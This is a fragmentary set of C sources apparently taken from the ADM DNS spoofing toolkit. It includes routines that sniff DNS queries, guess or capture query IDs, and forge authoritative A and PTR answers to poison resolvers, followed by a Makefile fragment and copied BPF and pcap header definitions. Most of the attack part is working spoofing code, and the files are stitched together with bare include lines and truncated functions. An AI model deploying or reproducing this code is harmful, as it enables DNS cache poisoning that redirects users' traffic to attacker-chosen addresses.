sprintf(fakename,"%i%i%i%i%i%i.%s",
myrand(),
myrand(),
myrand(),
myrand(),
myrand(),
myrand(),
argv[3]);
sendquestion(s_ip,d_ip,fakename,TYPE_A);
/* end of question packet */
bzero(buffer2,sizeof(buffer2)); /* RE init some variable */
bzero(namez,sizeof(namez));
i=0;
x=0;
i=makepaketAW(data,fakename,SPOOFIP,TYPE_A);
udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+i);
}
for(timez=0;timez < TIMEOUT; timez++){
if( recvfrom(s_r,buffer,sizeof(buffer),0,(struct sockaddr *)&sin_rcp,&len) != -1 )
{
printf("ok whe have the reponse ;)\n");
timez = 0;
break;
}
usleep(10);
timez++;
}
if(timez != 0){
printf("hum no reponse from the NS ressend question..\n");
dnsqsnord(s_r,d_ip2,fakename,myrand());
}
else break;
}
/* ok we have a awnser */
printf("fakename = %s\n",fakename);
if(sin_rcp.sin_addr.s_addr == d_ip2 )
if(sin_rcp.sin_port == htons(53) )
{
if( dns_recv->qr == 1 )
if( dns_recv->rep_num == 0 ) /* hum we dont have found the right ID */
printf("try %i < ID < %i \n",ID-10,ID);
else{
/* Hoho we have the spoof has worked we have found the right ID ! */
printf("the DNS ID of %s iz %i< ID <%i !!\n",argv[4],loop-10,loop);
printf("let's send the spoof...\n");
dnsspoof(dnstrust,argv[4],spoofname,spoofip,loop,atoi(argv[5]));
printf("spoof sended ...\n");
exit(0);
}
} /* end of if (sin_rcp.sin_port == htons(53) ) */
bzero(buffer,sizeof(buffer));
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"
#include
#include
#define DNSHDRSIZE 12
#define SPOOF "127.0.0.1"
#define VERSION "ver 0.6 pub"
#define ERROR -1
int sraw, i, on=1, con, ID,DA_ID,type;
printf("Its Time to w8 \n");
if(ip->protocol == 17 )
if(ip->saddr.s_addr == d_ip )
if(ip->daddr.s_addr == s_ipns )
if(udp->dest == htons(53) )
if(dnsrecv->qr == 0 )
{
printf("kewl :)~ we have the packet !\n");
ID = dnsrecv->id ; /* we get the id */
printf("the current id of %s is %d \n",argv[2],ntohs(ID));
DA_ID = ntohs(ID);
printf("send the spoof...\n");
dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type);
printf("spoof sended...\n");
exit(0);
}
#include
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"
#define ERROR -1
#define DNSHDRSIZE 12
#define VERSION "ver 0.4 pub"
struct pcap_pkthdr h;
struct pcap *pcap_d;
struct iphdr *ip;
struct udphdr *udp;
struct dnshdr *dnsrecv, *dnssend;
char *data;
char *data2;
char *buffer;
char SPOOFIP[255];
char bla[255];
char spoofname[255];
char tmp2[255];
char ebuf[255];
char buffer2[1024];
unsigned char namez[255];
int sraw,on=1,tmp1,type;
if(dnsrecv->qr == 0)
{
strcpy(namez,data);
nameformat(namez,bla);
printf("hum we have a DNS question from %s diz guyz wanna %s!\n",inet_ntoa(ip->saddr),(char *)bla);
bzero(bla,sizeof(bla));
printf("the question have the type %i and type of the query %i\n"
,ntohs(*((u_short *)(data+strlen(data)+1)))
,ntohs(*((u_short *)(data+strlen(data)+2+1))));
/* well in diz version we only spoof the type 'A' */
/* check out for a new version in ftp.janova.org/pub/ADM */
printf("make the spoof packet...\n");
printf("dns header\n");
/* here we gonna start to make the spoofed paket :)*/
memcpy(dnssend,dnsrecv,DNSHDRSIZE+strlen(namez)+5);
dnssend->id=dnsrecv->id; /* haha the ID ;) */
dnssend->aa=1; /* i've the authority */
dnssend->ra=1; /* i've the recusion */
dnssend->qr=1; /* its a awser */
dnssend->rep_num = htons(1); /* i've one awnser */
printf("ID=%i\nnumba of question=%i\nnumba of awnser =%i\n"
,dnssend->id,ntohs(dnssend->que_num),ntohs(dnssend->rep_num));
printf("Question..\n");
printf("domainename=%s\n",data2);
printf("type of question=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1))));
printf("type of query=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1+2))));
if( type == TYPE_PTR){
tmp1=strlen(namez)+5;
strcpy(data2+tmp1,namez);
tmp1=tmp1+strlen(namez)+1;
bzero(tmp2,sizeof(tmp2));
nameformat(spoofname,tmp2);
printf("tmp2 = %s\n",tmp2);
printf(" mouhahahah \n");
*((u_short *)(data2+tmp1)) = htons(TYPE_PTR);
*((u_short *)(data2+tmp1+2)) = htons(1);
*((u_long *)(data2+tmp1+2+2)) = htonl(86400);
*((u_short *)(data2+tmp1+2+2+4)) = htons(strlen(tmp2)+1); /* RDLENGTH: name length plus terminating zero, as in the TYPE_PTR branch of ADMDNS2.c */
printf("bhaa?.\n");
strcpy((data2+tmp1+2+2+4+2),tmp2);
printf(" ouf !! =) \n");
tmp1 = tmp1 +strlen(tmp2)+ 1;
}
if( type == TYPE_A){
tmp1=strlen(namez)+5;
strcpy(data2+tmp1,namez);
tmp1=tmp1+strlen(namez)+1;
*((u_short *)(data2+tmp1)) = htons(TYPE_A);
*((u_short *)(data2+tmp1+2)) = htons(1);
*((u_long *)(data2+tmp1+2+2)) = htonl(86400);
*((u_short *)(data2+tmp1+2+2+4)) = htons(4);
*((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(SPOOFIP);
}
printf("Answer..\n");
printf("domainname=%s\n",tmp2);
printf("type=%i\n",ntohs(*((u_short *)(data2+tmp1))));
printf("classe=%i\n",ntohs(*((u_short *)(data2+tmp1+2))));
printf("time to live=%u\n",ntohl(*((u_long *)(data2+tmp1+2+2))));
printf("resource data lenght=%i\n",ntohs(*((u_short *)(data2+tmp1+2+2+4))));
printf("IP=%s\n",inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2))));
tmp1=tmp1+2+2+4+2+4; /* now tmp1 == the total length of packet dns */
/* without the dnshdr */
udp_send(sraw
,ip->daddr
,ip->saddr
,ntohs(udp->dest)
,ntohs(udp->source)
,buffer2
,DNSHDRSIZE+tmp1);
} /* end of the spoof */
# version 0.1
#/usr/contrib/bin/gcc -L. -I. ADMkillDNS.c -lsocket -lnsl -lpcap -o ../ADMbin/ADMkillDNS
# uncomment this if your are not on LinuX
#LIBS = -lsocket -lnsl -lpcap
all: ADMkillDNS ADMsnOOfID ADMsniffID ADMdnsfuckr ADMnOg00d

#ifndef BPF_MAJOR_VERSION
#define BPF_RELEASE 199606
#define BPF_ALIGNMENT sizeof(bpf_int32)
#define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1))
#define BPF_MAXINSNS 512
#define BPF_MAXBUFSIZE 0x8000
#define BPF_MINBUFSIZE 32
#define BPF_MAJOR_VERSION 1
#define BPF_MINOR_VERSION 1
#if (defined(sun) || defined(ibm032)) && !defined(__GNUC__)
#define BIOCGBLEN _IOR(B,102, u_int)
#define BIOCSBLEN _IOWR(B,102, u_int)
#define BIOCSETF _IOW(B,103, struct bpf_program)
#define BIOCFLUSH _IO(B,104)
#define BIOCPROMISC _IO(B,105)
#define BIOCGDLT _IOR(B,106, u_int)
#define BIOCGETIF _IOR(B,107, struct ifreq)
#define BIOCSETIF _IOW(B,108, struct ifreq)
#define BIOCSRTIMEOUT _IOW(B,109, struct timeval)
#define BIOCGRTIMEOUT _IOR(B,110, struct timeval)
#define BIOCGSTATS _IOR(B,111, struct bpf_stat)
#define BIOCIMMEDIATE _IOW(B,112, u_int)
#define BIOCVERSION _IOR(B,113, struct bpf_version)
#define BIOCSTCPF _IOW(B,114, struct bpf_program)
#define BIOCSUDPF _IOW(B,115, struct bpf_program)
#else
#define BIOCGBLEN _IOR('B',102, u_int)
#define BIOCSBLEN _IOWR('B',102, u_int)
#define BIOCSETF _IOW('B',103, struct bpf_program)
#define BIOCFLUSH _IO('B',104)
#define BIOCPROMISC _IO('B',105)
#define BIOCGDLT _IOR('B',106, u_int)
#define BIOCGETIF _IOR('B',107, struct ifreq)
#define BIOCSETIF _IOW('B',108, struct ifreq)
#define BIOCSRTIMEOUT _IOW('B',109, struct timeval)
#define BIOCGRTIMEOUT _IOR('B',110, struct timeval)
#define BIOCGSTATS _IOR('B',111, struct bpf_stat)
#define BIOCIMMEDIATE _IOW('B',112, u_int)
#define BIOCVERSION _IOR('B',113, struct bpf_version)
#define BIOCSTCPF _IOW('B',114, struct bpf_program)
#define BIOCSUDPF _IOW('B',115, struct bpf_program)
#endif
#ifdef KERNEL
#define SIZEOF_BPF_HDR 18
#endif
#define DLT_NULL 0 /* no link-layer encapsulation */
#define DLT_EN10MB 1 /* Ethernet (10Mb) */
#define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */
#define DLT_AX25 3 /* Amateur Radio AX.25 */
#define DLT_PRONET 4 /* Proteon ProNET Token Ring */
#define DLT_CHAOS 5 /* Chaos */
#define DLT_IEEE802 6 /* IEEE 802 Networks */
#define DLT_ARCNET 7 /* ARCNET */
#define DLT_SLIP 8 /* Serial Line IP */
#define DLT_PPP 9 /* Point-to-point Protocol */
#define DLT_FDDI 10 /* FDDI */
#define DLT_ATM_RFC1483 11 /* LLC/SNAP encapsulated atm */
#define DLT_RAW 12 /* raw IP */
#define DLT_SLIP_BSDOS 13 /* BSD/OS Serial Line IP */
#define DLT_PPP_BSDOS 14 /* BSD/OS Point-to-point Protocol */
#define BPF_CLASS(code) ((code) & 0x07)
#define BPF_LD 0x00
#define BPF_LDX 0x01
#define BPF_ST 0x02
#define BPF_STX 0x03
#define BPF_ALU 0x04
#define BPF_JMP 0x05
#define BPF_RET 0x06
#define BPF_MISC 0x07
#define BPF_SIZE(code) ((code) & 0x18)
#define BPF_W 0x00
#define BPF_H 0x08
#define BPF_B 0x10
#define BPF_MODE(code) ((code) & 0xe0)
#define BPF_IMM 0x00
#define BPF_ABS 0x20
#define BPF_IND 0x40
#define BPF_MEM 0x60
#define BPF_LEN 0x80
#define BPF_MSH 0xa0
#define BPF_OP(code) ((code) & 0xf0)
#define BPF_ADD 0x00
#define BPF_SUB 0x10
#define BPF_MUL 0x20
#define BPF_DIV 0x30
#define BPF_OR 0x40
#define BPF_AND 0x50
#define BPF_LSH 0x60
#define BPF_RSH 0x70
#define BPF_NEG 0x80
#define BPF_JA 0x00
#define BPF_JEQ 0x10
#define BPF_JGT 0x20
#define BPF_JGE 0x30
#define BPF_JSET 0x40
#define BPF_SRC(code) ((code) & 0x08)
#define BPF_K 0x00
#define BPF_X 0x08
#define BPF_RVAL(code) ((code) & 0x18)
#define BPF_A 0x10
#define BPF_MISCOP(code) ((code) & 0xf8)
#define BPF_TAX 0x00
#define BPF_TXA 0x80
#define BPF_STMT(code, k) { (u_short)(code), 0, 0, k }
#define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k }
#ifdef KERNEL
#else
#if __STDC__
#endif
#endif
#define BPF_MEMWORDS 16
#endif
#define DNSHDRSIZE 12
#ifndef IPVERSION
#endif /* IPVERSION */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#ifndef IP_MAXPACKET
#endif /* IP_MAXPACKET */
#ifndef lib_pcap_h
#define lib_pcap_h
#include
#include
#include
#include
#define PCAP_VERSION_MAJOR 2
#define PCAP_VERSION_MINOR 4
#define PCAP_ERRBUF_SIZE 256
#if BPF_RELEASE - 0 < 199406
#endif
#endif